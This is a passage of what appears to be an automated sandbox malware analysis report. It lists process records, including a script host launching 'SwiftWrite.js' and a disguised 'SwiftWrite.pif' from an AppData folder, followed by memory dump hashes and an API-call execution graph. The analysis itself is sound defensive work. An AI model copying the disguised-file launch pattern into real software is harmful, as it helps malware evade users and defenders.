                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                              Imagebase:0x7ff735c70000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:24
                                                                              Start time:15:00:53
                                                                              Start date:18/12/2024
                                                                              Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                              Imagebase:0x9c0000
                                                                              File size:893'608 bytes
                                                                              MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 8%, ReversingLabs
                                                                              Has exited:false

                                                                                • Instruction Fuzzy Hash: 9351D373B0DA4A4FE7A9EB9C846867477D1FF58314B4801FAD05DCB2A6DA39AC428740
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1943413149.00007FFD9AA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AA80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ffd9aa80000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f26871e52da46310ef390ff34cc6fa89af4fb7259412c4544e9c80a6534a7ec6
                                                                                • Instruction ID: 86b5de6688d483bb85d21a2d53853c0fad86bd84367143559c52aaddece4cdde
                                                                                • Opcode Fuzzy Hash: f26871e52da46310ef390ff34cc6fa89af4fb7259412c4544e9c80a6534a7ec6
                                                                                • Instruction Fuzzy Hash: CF418363F0EA870BF7BDA7AC0875279B6C1AF95255B5800FED45DCB1E6DD2CAC068201
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1942986628.00007FFD9A9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A9B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ffd9a9b0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                                • Instruction ID: 00c2826002868e9930029d47cc23fd8ebf415929a678cd6e5201be5ae1f1dcf9
                                                                                • Opcode Fuzzy Hash: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                                • Instruction Fuzzy Hash: 7201A77120CB0C4FD748EF0CE451AA6B3E0FB85324F10056EE58AC3695D632E881CB42
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1943413149.00007FFD9AA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AA80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ffd9aa80000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 284353813443108c77411a9c09d3f637a5ed3c5db5155e4ac23f95640d687d72
                                                                                • Instruction ID: bc7d4910a1c44384aa1753f7d0bb9ca59ec931d8cf0e00ab114dda015607eefb
                                                                                • Opcode Fuzzy Hash: 284353813443108c77411a9c09d3f637a5ed3c5db5155e4ac23f95640d687d72
                                                                                • Instruction Fuzzy Hash: A8E0DF33F0E82D0FEBB9EAEC28792F87281EF5862170802BBE91DD7181DD14AC114395

                                                                                Execution Graph

                                                                                Execution Coverage:2.5%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:11.7%
                                                                                Total number of Nodes:1532
                                                                                Total number of Limit Nodes:44
94775->94784 94785 7ff79f894f0c 94775->94785 94788 7ff79f8950b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94775->94788 94789 7ff79f8936c4 77 API calls 94775->94789 94790 7ff79f8937dc 300 API calls 94775->94790 94795 7ff79f87ee20 5 API calls Concurrency::wait 94775->94795 94796 7ff79f8dac10 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94775->94796 94778->94743 94779->94775 94780->94761 94781->94775 94782->94775 94784->94775 94799 7ff79f894ebc 94785->94799 94787 7ff79f894f15 94787->94775 94789->94775 94790->94775 94791->94778 94792->94751 94793->94746 94794->94775 94795->94775 94796->94775 94797->94770 94798->94770 94800 7ff79f894eeb 94799->94800 94802 7ff79f894ee1 _onexit 94799->94802 94803 7ff79f8aab08 34 API calls _onexit 94800->94803 94802->94787 94803->94802 94804 7ff79f895328 94829 7ff79f894cac 94804->94829 94807 7ff79f895474 94863 7ff79f8957e4 7 API calls 2 library calls 94807->94863 94808 7ff79f895344 94810 7ff79f89547e 94808->94810 94811 7ff79f895362 94808->94811 94864 7ff79f8957e4 7 API calls 2 library calls 94810->94864 94821 7ff79f8953a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 94811->94821 94835 7ff79f8aae1c 94811->94835 94815 7ff79f895387 94817 7ff79f895489 abort 94818 7ff79f89540d 94846 7ff79f895930 94818->94846 94820 7ff79f895412 94849 7ff79f873730 94820->94849 94821->94818 94860 7ff79f899204 35 API calls pair 94821->94860 94826 7ff79f895435 94826->94817 94862 7ff79f894e90 8 API calls 2 library calls 94826->94862 94828 7ff79f89544c 94828->94815 94830 7ff79f894cce __scrt_initialize_crt 94829->94830 94865 7ff79f8965ec 94830->94865 94832 7ff79f894cd7 94832->94807 94832->94808 94833 7ff79f894cd3 __scrt_initialize_crt 94833->94832 94873 7ff79f896620 8 API calls 3 library calls 94833->94873 94837 7ff79f8aae34 94835->94837 94836 7ff79f895383 94836->94815 94839 7ff79f8aada4 94836->94839 94837->94836 94898 7ff79f895244 94837->94898 94840 7ff79f8aadff 94839->94840 94841 
7ff79f8aade0 94839->94841 94840->94821 94841->94840 94957 7ff79f8710e8 94841->94957 94962 7ff79f871064 94841->94962 94967 7ff79f871080 94841->94967 94972 7ff79f871048 94841->94972 95166 7ff79f896240 94846->95166 94850 7ff79f8737a3 94849->94850 94851 7ff79f873743 IsThemeActive 94849->94851 94861 7ff79f895974 GetModuleHandleW 94850->94861 95168 7ff79f8992d0 94851->95168 94857 7ff79f87377d 95180 7ff79f8737b0 94857->95180 94859 7ff79f873785 SystemParametersInfoW 94859->94850 94860->94818 94861->94826 94862->94828 94863->94810 94864->94817 94866 7ff79f8965f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 94865->94866 94874 7ff79f897290 94866->94874 94869 7ff79f896603 94869->94833 94871 7ff79f89660c 94871->94869 94881 7ff79f8972d8 DeleteCriticalSection 94871->94881 94873->94832 94875 7ff79f897298 94874->94875 94877 7ff79f8972c9 94875->94877 94878 7ff79f8965ff 94875->94878 94882 7ff79f897614 94875->94882 94887 7ff79f8972d8 DeleteCriticalSection 94877->94887 94878->94869 94880 7ff79f897218 8 API calls 3 library calls 94878->94880 94880->94871 94881->94869 94888 7ff79f897310 94882->94888 94885 7ff79f89765f InitializeCriticalSectionAndSpinCount 94886 7ff79f897654 94885->94886 94886->94875 94887->94878 94889 7ff79f897371 94888->94889 94896 7ff79f89736c try_get_function 94888->94896 94889->94885 94889->94886 94890 7ff79f897454 94890->94889 94893 7ff79f897462 GetProcAddress 94890->94893 94891 7ff79f8973a0 LoadLibraryExW 94892 7ff79f8973c1 GetLastError 94891->94892 94891->94896 94892->94896 94894 7ff79f897473 94893->94894 94894->94889 94895 7ff79f897439 FreeLibrary 94895->94896 94896->94889 94896->94890 94896->94891 94896->94895 94897 7ff79f8973fb LoadLibraryExW 94896->94897 94897->94896 94899 7ff79f895254 94898->94899 94915 7ff79f8a2584 94899->94915 94901 7ff79f895260 94921 7ff79f894cf8 94901->94921 94903 7ff79f895279 _RTC_Initialize 94906 7ff79f894f0c __scrt_initialize_thread_safe_statics 34 API calls 94903->94906 94913 7ff79f8952ce 94903->94913 94905 7ff79f8952fa 
__scrt_initialize_default_local_stdio_options 94905->94837 94907 7ff79f89528e 94906->94907 94926 7ff79f8aa09c 94907->94926 94911 7ff79f8952a3 94912 7ff79f8aaebc 35 API calls 94911->94912 94912->94913 94914 7ff79f8952ea 94913->94914 94949 7ff79f8957e4 7 API calls 2 library calls 94913->94949 94914->94837 94916 7ff79f8a2595 94915->94916 94918 7ff79f8a259d 94916->94918 94950 7ff79f8a55d4 15 API calls abort 94916->94950 94918->94901 94919 7ff79f8a25ac 94951 7ff79f8ab164 31 API calls _invalid_parameter_noinfo 94919->94951 94922 7ff79f894d0d 94921->94922 94925 7ff79f894d16 __scrt_initialize_onexit_tables __scrt_release_startup_lock 94921->94925 94922->94925 94952 7ff79f8957e4 7 API calls 2 library calls 94922->94952 94924 7ff79f894dcf 94925->94903 94927 7ff79f8aa0d0 GetModuleFileNameW 94926->94927 94928 7ff79f8aa0ba 94926->94928 94932 7ff79f8aa0fd 94927->94932 94953 7ff79f8a55d4 15 API calls abort 94928->94953 94930 7ff79f8aa0bf 94954 7ff79f8ab164 31 API calls _invalid_parameter_noinfo 94930->94954 94955 7ff79f8aa038 15 API calls 2 library calls 94932->94955 94933 7ff79f89529a 94933->94913 94948 7ff79f895ac4 InitializeSListHead 94933->94948 94935 7ff79f8aa13d 94936 7ff79f8aa145 94935->94936 94938 7ff79f8aa156 94935->94938 94956 7ff79f8a55d4 15 API calls abort 94936->94956 94940 7ff79f8aa1a2 94938->94940 94941 7ff79f8aa1bb 94938->94941 94946 7ff79f8aa14a 94938->94946 94939 7ff79f8ab3c0 __free_lconv_num 15 API calls 94939->94933 94942 7ff79f8ab3c0 __free_lconv_num 15 API calls 94940->94942 94944 7ff79f8ab3c0 __free_lconv_num 15 API calls 94941->94944 94943 7ff79f8aa1ab 94942->94943 94945 7ff79f8ab3c0 __free_lconv_num 15 API calls 94943->94945 94944->94946 94947 7ff79f8aa1b7 94945->94947 94946->94939 94947->94933 94949->94905 94950->94919 94951->94918 94952->94924 94953->94930 94954->94933 94955->94935 94956->94946 94977 7ff79f891d80 94957->94977 94960 7ff79f894ebc _onexit 34 API calls 94961 7ff79f894f15 94960->94961 94961->94841 95001 7ff79f877ec0 94962->95001 94964 
7ff79f87106d 94965 7ff79f894ebc _onexit 34 API calls 94964->94965 94966 7ff79f894f15 94965->94966 94966->94841 95085 7ff79f877920 94967->95085 94969 7ff79f87109e 94970 7ff79f894ebc _onexit 34 API calls 94969->94970 94971 7ff79f894f15 94970->94971 94971->94841 95148 7ff79f877718 94972->95148 94975 7ff79f894ebc _onexit 34 API calls 94976 7ff79f894f15 94975->94976 94976->94841 94978 7ff79f879640 4 API calls 94977->94978 94979 7ff79f891db2 GetVersionExW 94978->94979 94980 7ff79f877cf4 4 API calls 94979->94980 94982 7ff79f891dfc 94980->94982 94981 7ff79f87dda4 4 API calls 94981->94982 94982->94981 94983 7ff79f891e87 94982->94983 94984 7ff79f87dda4 4 API calls 94983->94984 94985 7ff79f891ea4 94984->94985 94986 7ff79f8d9645 94985->94986 94988 7ff79f891f3c GetCurrentProcess IsWow64Process 94985->94988 94987 7ff79f8d964f 94986->94987 94999 7ff79f8e32f4 LoadLibraryA GetProcAddress 94987->94999 94989 7ff79f891f7e __scrt_get_show_window_mode 94988->94989 94989->94987 94991 7ff79f891f86 GetSystemInfo 94989->94991 94993 7ff79f8710f1 94991->94993 94992 7ff79f8d96b1 94994 7ff79f8d96b5 94992->94994 94995 7ff79f8d96d7 GetSystemInfo 94992->94995 94993->94960 95000 7ff79f8e32f4 LoadLibraryA GetProcAddress 94994->95000 94997 7ff79f8d96bf 94995->94997 94997->94993 94998 7ff79f8d96f0 FreeLibrary 94997->94998 94998->94993 94999->94992 95000->94997 95037 7ff79f8782b4 95001->95037 95004 7ff79f8782b4 4 API calls 95005 7ff79f877f3a 95004->95005 95006 7ff79f879640 4 API calls 95005->95006 95007 7ff79f877f46 95006->95007 95008 7ff79f877cf4 4 API calls 95007->95008 95009 7ff79f877f59 95008->95009 95044 7ff79f892d5c 6 API calls 95009->95044 95011 7ff79f877fa5 95012 7ff79f879640 4 API calls 95011->95012 95013 7ff79f877fb1 95012->95013 95014 7ff79f879640 4 API calls 95013->95014 95015 7ff79f877fbd 95014->95015 95016 7ff79f879640 4 API calls 95015->95016 95017 7ff79f877fc9 95016->95017 95018 7ff79f879640 4 API calls 95017->95018 95019 7ff79f87800f 95018->95019 95020 7ff79f879640 4 API calls 
95019->95020 95021 7ff79f8780f7 95020->95021 95045 7ff79f88ef88 95021->95045 95023 7ff79f878103 95052 7ff79f88eec8 95023->95052 95025 7ff79f87812f 95026 7ff79f879640 4 API calls 95025->95026 95027 7ff79f87813b 95026->95027 95063 7ff79f886d40 95027->95063 95031 7ff79f8781ac 95032 7ff79f8781be GetStdHandle 95031->95032 95033 7ff79f878220 OleInitialize 95032->95033 95034 7ff79f8bd350 95032->95034 95033->94964 95080 7ff79f8effc8 CreateThread 95034->95080 95036 7ff79f8bd367 CloseHandle 95038 7ff79f879640 4 API calls 95037->95038 95039 7ff79f8782c6 95038->95039 95040 7ff79f879640 4 API calls 95039->95040 95041 7ff79f8782cf 95040->95041 95042 7ff79f879640 4 API calls 95041->95042 95043 7ff79f877f2e 95042->95043 95043->95004 95044->95011 95046 7ff79f879640 4 API calls 95045->95046 95047 7ff79f88efa3 95046->95047 95048 7ff79f879640 4 API calls 95047->95048 95049 7ff79f88efac 95048->95049 95050 7ff79f879640 4 API calls 95049->95050 95051 7ff79f88f02e 95050->95051 95051->95023 95053 7ff79f88eede 95052->95053 95054 7ff79f879640 4 API calls 95053->95054 95055 7ff79f88eeea 95054->95055 95056 7ff79f879640 4 API calls 95055->95056 95057 7ff79f88eef6 95056->95057 95058 7ff79f879640 4 API calls 95057->95058 95059 7ff79f88ef02 95058->95059 95060 7ff79f879640 4 API calls 95059->95060 95061 7ff79f88ef0e 95060->95061 95062 7ff79f88ef68 RegisterWindowMessageW 95061->95062 95062->95025 95064 7ff79f886db9 95063->95064 95071 7ff79f886d80 95063->95071 95081 7ff79f895114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95064->95081 95072 7ff79f87816b 95071->95072 95082 7ff79f895114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95071->95082 95073 7ff79f8939a8 95072->95073 95074 7ff79f8da502 95073->95074 95079 7ff79f8939cc 95073->95079 95083 7ff79f87ee20 5 API calls Concurrency::wait 95074->95083 95076 7ff79f8da50e 95084 7ff79f87ee20 5 API calls Concurrency::wait 95076->95084 
95078 7ff79f8da52d 95079->95031 95080->95036 95083->95076 95084->95078 95086 7ff79f877948 wcsftime 95085->95086 95087 7ff79f879640 4 API calls 95086->95087 95088 7ff79f877a02 95087->95088 95115 7ff79f875680 95088->95115 95090 7ff79f877a0c 95122 7ff79f893a38 95090->95122 95093 7ff79f8771f8 4 API calls 95094 7ff79f877a2c 95093->95094 95128 7ff79f874680 95094->95128 95096 7ff79f877a3d 95097 7ff79f879640 4 API calls 95096->95097 95098 7ff79f877a47 95097->95098 95132 7ff79f87a854 95098->95132 95101 7ff79f8bd05c RegQueryValueExW 95102 7ff79f8bd131 RegCloseKey 95101->95102 95103 7ff79f8bd08f 95101->95103 95106 7ff79f877a83 Concurrency::wait 95102->95106 95114 7ff79f8bd147 wcscat Concurrency::wait 95102->95114 95104 7ff79f894c68 4 API calls 95103->95104 95105 7ff79f8bd0b2 95104->95105 95107 7ff79f8bd0bf RegQueryValueExW 95105->95107 95106->94969 95108 7ff79f8bd0f3 95107->95108 95111 7ff79f8bd112 95107->95111 95109 7ff79f877cf4 4 API calls 95108->95109 95109->95111 95110 7ff79f879d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95110->95114 95111->95102 95112 7ff79f87ec00 4 API calls 95112->95114 95113 7ff79f874680 4 API calls 95113->95114 95114->95106 95114->95110 95114->95112 95114->95113 95136 7ff79f8b8f90 95115->95136 95118 7ff79f87ec00 4 API calls 95119 7ff79f8756b4 95118->95119 95138 7ff79f8756d4 95119->95138 95121 7ff79f8756c1 Concurrency::wait 95121->95090 95123 7ff79f8b8f90 wcsftime 95122->95123 95124 7ff79f893a44 GetFullPathNameW 95123->95124 95125 7ff79f893a74 95124->95125 95126 7ff79f877cf4 4 API calls 95125->95126 95127 7ff79f877a1b 95126->95127 95127->95093 95129 7ff79f87469f 95128->95129 95131 7ff79f8746c8 memcpy_s 95128->95131 95130 7ff79f894c68 4 API calls 95129->95130 95130->95131 95131->95096 95133 7ff79f87a87a 95132->95133 95135 7ff79f877a51 RegOpenKeyExW 95132->95135 95134 7ff79f894c68 4 API calls 95133->95134 95134->95135 95135->95101 95135->95106 95137 7ff79f87568c GetModuleFileNameW 95136->95137 95137->95118 95139 
7ff79f8b8f90 wcsftime 95138->95139 95140 7ff79f8756e9 GetFullPathNameW 95139->95140 95141 7ff79f8bc03a 95140->95141 95142 7ff79f875712 95140->95142 95144 7ff79f87a854 4 API calls 95141->95144 95143 7ff79f877cf4 4 API calls 95142->95143 95145 7ff79f87571c 95143->95145 95144->95145 95145->95145 95146 7ff79f87dda4 4 API calls 95145->95146 95147 7ff79f875785 95146->95147 95147->95121 95149 7ff79f879640 4 API calls 95148->95149 95150 7ff79f87778f 95149->95150 95155 7ff79f876f24 95150->95155 95153 7ff79f87782c 95154 7ff79f871051 95153->95154 95158 7ff79f877410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95153->95158 95154->94975 95159 7ff79f876f60 95155->95159 95158->95153 95160 7ff79f876f85 95159->95160 95161 7ff79f876f52 95159->95161 95160->95161 95162 7ff79f876f93 RegOpenKeyExW 95160->95162 95161->95153 95162->95161 95163 7ff79f876faf RegQueryValueExW 95162->95163 95164 7ff79f876ff5 RegCloseKey 95163->95164 95165 7ff79f876fdd 95163->95165 95164->95161 95165->95164 95167 7ff79f895947 GetStartupInfoW 95166->95167 95167->94820 95226 7ff79f8ab9bc EnterCriticalSection 95168->95226 95170 7ff79f8992e4 95171 7ff79f8aba10 _isindst LeaveCriticalSection 95170->95171 95172 7ff79f87376e 95171->95172 95173 7ff79f899334 95172->95173 95174 7ff79f89933d 95173->95174 95178 7ff79f873778 95173->95178 95227 7ff79f8a55d4 15 API calls abort 95174->95227 95176 7ff79f899342 95228 7ff79f8ab164 31 API calls _invalid_parameter_noinfo 95176->95228 95179 7ff79f8736e8 SystemParametersInfoW SystemParametersInfoW 95178->95179 95179->94857 95181 7ff79f8737cd wcsftime 95180->95181 95182 7ff79f879640 4 API calls 95181->95182 95183 7ff79f8737dd GetCurrentDirectoryW 95182->95183 95229 7ff79f8757a0 95183->95229 95185 7ff79f873807 IsDebuggerPresent 95186 7ff79f8bb872 MessageBoxA 95185->95186 95187 7ff79f873815 95185->95187 95188 7ff79f8bb894 95186->95188 95187->95188 95189 7ff79f873839 95187->95189 95339 7ff79f87e278 RtlPcToFileHeader RaiseException 
EnterCriticalSection LeaveCriticalSection 95188->95339 95303 7ff79f873f04 95189->95303 95193 7ff79f873860 GetFullPathNameW 95194 7ff79f877cf4 4 API calls 95193->95194 95195 7ff79f8738a6 95194->95195 95319 7ff79f873f9c 95195->95319 95196 7ff79f8738bf 95198 7ff79f8bb8dc SetCurrentDirectoryW 95196->95198 95199 7ff79f8738c7 95196->95199 95198->95199 95200 7ff79f8738d0 95199->95200 95340 7ff79f8dd540 AllocateAndInitializeSid CheckTokenMembership FreeSid 95199->95340 95335 7ff79f873b84 7 API calls 95200->95335 95203 7ff79f8bb8f8 95203->95200 95206 7ff79f8bb90c 95203->95206 95208 7ff79f875680 6 API calls 95206->95208 95207 7ff79f8738da 95210 7ff79f876258 46 API calls 95207->95210 95213 7ff79f8738ef 95207->95213 95209 7ff79f8bb916 95208->95209 95211 7ff79f87ec00 4 API calls 95209->95211 95210->95213 95212 7ff79f8bb927 95211->95212 95215 7ff79f8bb930 95212->95215 95216 7ff79f8bb94d 95212->95216 95214 7ff79f873913 95213->95214 95217 7ff79f875d88 Shell_NotifyIconW 95213->95217 95219 7ff79f87391f SetCurrentDirectoryW 95214->95219 95218 7ff79f8771f8 4 API calls 95215->95218 95220 7ff79f8771f8 4 API calls 95216->95220 95217->95214 95222 7ff79f8bb93c 95218->95222 95221 7ff79f873934 Concurrency::wait 95219->95221 95223 7ff79f8bb963 GetForegroundWindow ShellExecuteW 95220->95223 95221->94859 95341 7ff79f877c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95222->95341 95225 7ff79f8bb99f Concurrency::wait 95223->95225 95225->95214 95227->95176 95228->95178 95230 7ff79f879640 4 API calls 95229->95230 95231 7ff79f8757d7 95230->95231 95342 7ff79f879bbc 95231->95342 95233 7ff79f8757fe 95234 7ff79f875680 6 API calls 95233->95234 95235 7ff79f875812 95234->95235 95236 7ff79f87ec00 4 API calls 95235->95236 95237 7ff79f875823 95236->95237 95356 7ff79f876460 95237->95356 95240 7ff79f87584e Concurrency::wait 95245 7ff79f87e0a8 4 API calls 95240->95245 95241 7ff79f8bc05e 95429 7ff79f8f2948 95241->95429 95243 7ff79f8bc074 95244 7ff79f8bc081 
95243->95244 95246 7ff79f87652c 63 API calls 95243->95246 95447 7ff79f87652c 95244->95447 95247 7ff79f87586a 95245->95247 95246->95244 95249 7ff79f87ec00 4 API calls 95247->95249 95250 7ff79f875888 95249->95250 95254 7ff79f8bc099 95250->95254 95382 7ff79f87eff8 95250->95382 95252 7ff79f8758ad Concurrency::wait 95253 7ff79f87ec00 4 API calls 95252->95253 95255 7ff79f8758d7 95253->95255 95257 7ff79f875ab4 4 API calls 95254->95257 95255->95254 95256 7ff79f87eff8 46 API calls 95255->95256 95259 7ff79f8758fc Concurrency::wait 95256->95259 95258 7ff79f8bc0e1 95257->95258 95260 7ff79f875ab4 4 API calls 95258->95260 95262 7ff79f879640 4 API calls 95259->95262 95261 7ff79f8bc103 95260->95261 95265 7ff79f875680 6 API calls 95261->95265 95263 7ff79f87591f 95262->95263 95395 7ff79f875ab4 95263->95395 95267 7ff79f8bc12b 95265->95267 95269 7ff79f875ab4 4 API calls 95267->95269 95272 7ff79f8bc139 95269->95272 95270 7ff79f875941 95270->95254 95271 7ff79f875949 95270->95271 95273 7ff79f898e28 wcsftime 37 API calls 95271->95273 95274 7ff79f87e0a8 4 API calls 95272->95274 95276 7ff79f875958 95273->95276 95275 7ff79f8bc14a 95274->95275 95277 7ff79f875ab4 4 API calls 95275->95277 95276->95258 95278 7ff79f875960 95276->95278 95279 7ff79f8bc15b 95277->95279 95280 7ff79f898e28 wcsftime 37 API calls 95278->95280 95283 7ff79f87e0a8 4 API calls 95279->95283 95281 7ff79f87596f 95280->95281 95281->95261 95282 7ff79f875977 95281->95282 95284 7ff79f898e28 wcsftime 37 API calls 95282->95284 95285 7ff79f8bc172 95283->95285 95286 7ff79f875986 95284->95286 95287 7ff79f875ab4 4 API calls 95285->95287 95288 7ff79f8759c6 95286->95288 95291 7ff79f875ab4 4 API calls 95286->95291 95290 7ff79f8bc183 95287->95290 95288->95279 95289 7ff79f8759d3 95288->95289 95418 7ff79f87df90 95289->95418 95292 7ff79f8759a8 95291->95292 95293 7ff79f87e0a8 4 API calls 95292->95293 95295 7ff79f8759b5 95293->95295 95297 7ff79f875ab4 4 API calls 95295->95297 95297->95288 95299 7ff79f875a12 95300 7ff79f87d670 5 API calls 
95299->95300 95301 7ff79f875ab4 4 API calls 95299->95301 95302 7ff79f875a60 Concurrency::wait 95299->95302 95300->95299 95301->95299 95302->95185 95304 7ff79f873f29 wcsftime 95303->95304 95305 7ff79f873f4b 95304->95305 95306 7ff79f8bba2c __scrt_get_show_window_mode 95304->95306 95307 7ff79f8756d4 5 API calls 95305->95307 95308 7ff79f8bba4d GetOpenFileNameW 95306->95308 95309 7ff79f873f56 95307->95309 95310 7ff79f873858 95308->95310 95311 7ff79f8bbab0 95308->95311 95791 7ff79f873eb4 95309->95791 95310->95193 95310->95196 95313 7ff79f877cf4 4 API calls 95311->95313 95315 7ff79f8bbabc 95313->95315 95317 7ff79f873f6c 95809 7ff79f876394 95317->95809 95320 7ff79f873fb6 wcsftime 95319->95320 95852 7ff79f879734 95320->95852 95322 7ff79f873fc4 95323 7ff79f874050 95322->95323 95862 7ff79f874d28 77 API calls 95322->95862 95323->95196 95325 7ff79f873fd3 95325->95323 95863 7ff79f874b0c 79 API calls Concurrency::wait 95325->95863 95327 7ff79f873fe0 95327->95323 95328 7ff79f873fe8 GetFullPathNameW 95327->95328 95329 7ff79f877cf4 4 API calls 95328->95329 95330 7ff79f874014 95329->95330 95331 7ff79f877cf4 4 API calls 95330->95331 95332 7ff79f874028 95331->95332 95333 7ff79f8bbac2 wcscat 95332->95333 95334 7ff79f877cf4 4 API calls 95332->95334 95334->95323 95867 7ff79f873d90 7 API calls 95335->95867 95337 7ff79f8738d5 95338 7ff79f873cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 95337->95338 95339->95196 95340->95203 95341->95216 95343 7ff79f879be5 wcsftime 95342->95343 95344 7ff79f877cf4 4 API calls 95343->95344 95345 7ff79f879c1b 95343->95345 95344->95345 95353 7ff79f879c4a Concurrency::wait 95345->95353 95453 7ff79f879d84 95345->95453 95347 7ff79f87ec00 4 API calls 95348 7ff79f879d4a 95347->95348 95350 7ff79f874680 4 API calls 95348->95350 95349 7ff79f87ec00 4 API calls 95349->95353 95351 7ff79f879d57 Concurrency::wait 95350->95351 95351->95233 95352 7ff79f874680 4 API calls 95352->95353 95353->95349 95353->95352 95354 7ff79f879d21 95353->95354 95355 7ff79f879d84 
RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95353->95355 95354->95347 95354->95351 95355->95353 95456 7ff79f876d64 95356->95456 95359 7ff79f876d64 2 API calls 95362 7ff79f87649d 95359->95362 95360 7ff79f8764ba FreeLibrary 95361 7ff79f8764c0 95360->95361 95460 7ff79f8a48e0 95361->95460 95362->95360 95362->95361 95365 7ff79f8764db LoadLibraryExW 95479 7ff79f876cc4 95365->95479 95366 7ff79f8bc8f6 95367 7ff79f87652c 63 API calls 95366->95367 95369 7ff79f8bc8fe 95367->95369 95372 7ff79f876cc4 3 API calls 95369->95372 95374 7ff79f8bc907 95372->95374 95373 7ff79f876505 95373->95374 95375 7ff79f876512 95373->95375 95501 7ff79f8767d8 95374->95501 95376 7ff79f87652c 63 API calls 95375->95376 95378 7ff79f875846 95376->95378 95378->95240 95378->95241 95381 7ff79f8bc93f 95704 7ff79f881a30 95382->95704 95384 7ff79f87f029 95385 7ff79f8ca7a8 95384->95385 95386 7ff79f87f040 95384->95386 95720 7ff79f87ee20 5 API calls Concurrency::wait 95385->95720 95389 7ff79f894c68 4 API calls 95386->95389 95388 7ff79f8ca7bc 95390 7ff79f87f066 95389->95390 95391 7ff79f87f08f 95390->95391 95719 7ff79f87f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95390->95719 95715 7ff79f87f1bc 95391->95715 95394 7ff79f87f0c6 95394->95252 95396 7ff79f875ac6 95395->95396 95397 7ff79f875ae4 95395->95397 95399 7ff79f87e0a8 4 API calls 95396->95399 95398 7ff79f877cf4 4 API calls 95397->95398 95400 7ff79f87592d 95398->95400 95399->95400 95401 7ff79f898e28 95400->95401 95402 7ff79f898ea4 95401->95402 95403 7ff79f898e3f 95401->95403 95724 7ff79f898d98 35 API calls 2 library calls 95402->95724 95410 7ff79f898e63 95403->95410 95722 7ff79f8a55d4 15 API calls abort 95403->95722 95406 7ff79f898ed6 95408 7ff79f898ee2 95406->95408 95416 7ff79f898ef9 95406->95416 95407 7ff79f898e49 95723 7ff79f8ab164 31 API calls _invalid_parameter_noinfo 95407->95723 95725 7ff79f8a55d4 15 API calls abort 95408->95725 95410->95270 95412 7ff79f898e54 95412->95270 95413 
7ff79f898ee7 95726 7ff79f8ab164 31 API calls _invalid_parameter_noinfo 95413->95726 95414 7ff79f8a2c80 37 API calls wcsftime 95414->95416 95416->95414 95417 7ff79f898ef2 95416->95417 95417->95270 95420 7ff79f87dfac 95418->95420 95419 7ff79f894c68 4 API calls 95421 7ff79f8759f5 95419->95421 95420->95419 95420->95421 95422 7ff79f87d670 95421->95422 95423 7ff79f87d698 95422->95423 95428 7ff79f87d6a2 95423->95428 95727 7ff79f87880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95423->95727 95426 7ff79f8c9d43 95427 7ff79f87d7de 95427->95299 95428->95427 95728 7ff79f87ee20 5 API calls Concurrency::wait 95428->95728 95430 7ff79f8f29c8 95429->95430 95729 7ff79f8f2b70 95430->95729 95433 7ff79f8767d8 45 API calls 95434 7ff79f8f2a03 95433->95434 95435 7ff79f8767d8 45 API calls 95434->95435 95436 7ff79f8f2a23 95435->95436 95437 7ff79f8767d8 45 API calls 95436->95437 95438 7ff79f8f2a49 95437->95438 95439 7ff79f8767d8 45 API calls 95438->95439 95440 7ff79f8f2a6d 95439->95440 95441 7ff79f8767d8 45 API calls 95440->95441 95442 7ff79f8f2ac5 95441->95442 95443 7ff79f8f240c 32 API calls 95442->95443 95444 7ff79f8f2ada 95443->95444 